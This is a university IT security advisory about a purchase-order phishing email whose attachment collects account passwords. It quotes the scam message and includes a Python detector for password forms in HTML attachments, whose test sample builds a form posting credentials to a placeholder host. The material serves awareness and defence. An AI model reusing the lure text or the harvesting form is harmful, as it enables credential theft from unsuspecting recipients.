
A Phishing Scam With A Malicious Attachment

A Well-Designed Attempt to Gather Your Account and Password

DoIT received a report of a phishing scam that depends on the download and execution of an attachment.  The message, as seen below, appears to come from Joel Avila, the CEO of Edwards Label in Ventura, California.  Mr. Avila exists and really is CEO of that company, but he has nothing to do with this message.

from: Joel Avila <renqingiot@163.com>

to: removed for privacy

date: Aug 10, 2021, 12:08:50 PM

subject: PO1088EDW88


Hi,


I need your company to confirm if you can supply the attached PO.

Remember that we have encrypted your removed for privacy@umbc.edu product


Download PO1088_EDW88 and get back to us with your best price asap


Thanks,



Joel Avila

CEO/CFO

Edwards Label

2277 West Knoll Drive

Ventura, CA 93003

P (805) 658-2444 Ext.116

F (805) 658-0233



Email scams generally try to create a sense of urgency, often around money.  They either threaten the recipient with imminent financial loss or offer the promise of immediate financial gain as long as the recipient acts quickly.  This scam takes a more subtle approach by suggesting that the recipient has been confused with some company that can supply a product that Mr. Avila is looking for.  A supposed purchase order is attached and the recipient might well consider looking at it for more information.


Once downloaded and clicked, the attachment displays a web page asking for a username and password.  Whatever is entered, the user will get a message that the entry is invalid.  In the meantime, the entered information will be stored on a remote server (in Nigeria in this particular instance).  Eventually, that server will accumulate a list of account/password pairs from people all over the world.
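A mail-triage check for this pattern, as an added example that is not part of the original notice or any DoIT tooling: it walks a message's attachments, parses any HTML file, and reports where a form containing a password field would send its data. It assumes the attachment is an HTML file with a form; the sample message, `collector.example.net`, and `PO_sample.html` are constructed placeholders.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormScanner(HTMLParser):
    """Records the action URL of each form that holds a password field."""
    def __init__(self):
        super().__init__()
        self.action = None   # action of the <form> currently open, else None
        self.hits = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.action = attrs.get("action") or ""
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            # No enclosing form, or no action: submission is done by script.
            self.hits.append(self.action or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self.action = None

def scan_message(raw: bytes):
    """Return (filename, destination) per password field in HTML attachments."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html"
        if not (is_html or name.lower().endswith((".htm", ".html"))):
            continue
        body = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        scanner = FormScanner()
        scanner.feed(body)
        for action in scanner.hits:
            host = urlparse(action).hostname
            findings.append((name, host or "unknown (relative action or script)"))
    return findings

def build_sample() -> bytes:
    """Constructed sample message; host and filename are placeholders."""
    m = EmailMessage()
    m.set_content("Please see the attached PO.")
    page = ('<form action="https://collector.example.net/save" method="post">'
            '<input name="user"><input type="password" name="pass"></form>')
    m.add_attachment(page.encode(), maintype="text", subtype="html",
                     filename="PO_sample.html")
    return m.as_bytes()
```

Calling `scan_message(build_sample())` flags the attachment and names the host that would receive the credentials, which is the detail worth including when reporting the message.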


The moral is: If you aren’t sure what’s in it, don’t click it!

For more information about phishing, visit: https://itsecurity.umbc.edu/critical/?id=98136.


If you have received any message similar to the one listed above, please forward it with its headers to security@umbc.edu. For instructions, visit: https://wiki.umbc.edu/pages/viewpage.action?pageId=1867970.


________________________________________________________________________

Received any suspicious emails?

Forward them to security@umbc.edu along with the email headers. For instructions, visit: https://wiki.umbc.edu/pages/viewpage.action?pageId=1867970.


Follow us on myUMBC: https://my3.my.umbc.edu/groups/itsecurity.


Posted: September 16, 2021, 8:34 PM